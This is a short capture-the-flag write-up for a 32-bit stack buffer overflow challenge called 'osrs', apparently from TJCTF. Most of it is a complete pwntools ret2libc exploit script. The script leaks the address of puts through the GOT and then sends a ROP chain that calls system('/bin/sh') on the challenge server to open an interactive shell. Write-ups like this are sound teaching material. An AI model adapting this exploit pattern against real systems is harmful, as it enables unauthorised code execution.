My friend keeps talking about Old School RuneScape. He says he made a service to tell you about trees.
I don’t know what any of this means but this system sure looks old! It has like zero security features enabled…
At first, you might think that this was simple BoF where you write shell on a stack and return to the shell. Since in description they say they have zero security features enabled. Well ASLR is enabled so it won’t work. We know that it wont work because if you give invalid tree, you get pointer and you can see that it changes every time.
Since PIE is disabled, we can just do ROP to libc. This technique is explained in this post so I won’t be writing about it. https://elnath.io/2020/05/30/stop/
from pwn import * context.update(arch='i386', os='linux') is_local = False write_file = True if is_local: p = process("./osrs") libc = ELF("/usr/lib32/libc-2.30.so") else: p = remote("p1.tjctf.org", 8006) libc = ELF("./libc-2.27.so") #https://libc.blukat.me/?q=puts%3A0xf7e5e360 elf = ELF("./osrs") rop = ROP(elf) GOT_PUTS = elf.got["puts"] PRINTF = elf.plt["puts"] GET_TREE = elf.sym["get_tree"] RET = rop.find_gadget(['ret']) JUNK = 'A' * 272 JUNK_ADDR = 'B' * 4 ### First ROP ### p.recvline() p.sendline(JUNK + p32(PRINTF) + p32(GET_TREE) +p32(GOT_PUTS)) p.recvline() LEAK_PUTS = p.recvline() PUTS = u32(LEAK_PUTS[0:4]) print("LEAKED PUTS:" + hex(PUTS)) ### Second ROP ### offset_puts = libc.sym['puts'] offset_system = libc.sym['system'] offset_binsh = next(libc.search("/bin/sh")) SYSTEM = PUTS - (offset_puts - offset_system) BINSH = PUTS + (offset_binsh - offset_puts) p.sendline(JUNK + p32(SYSTEM) + JUNK_ADDR + p32(BINSH)) p.recvline() p.interactive()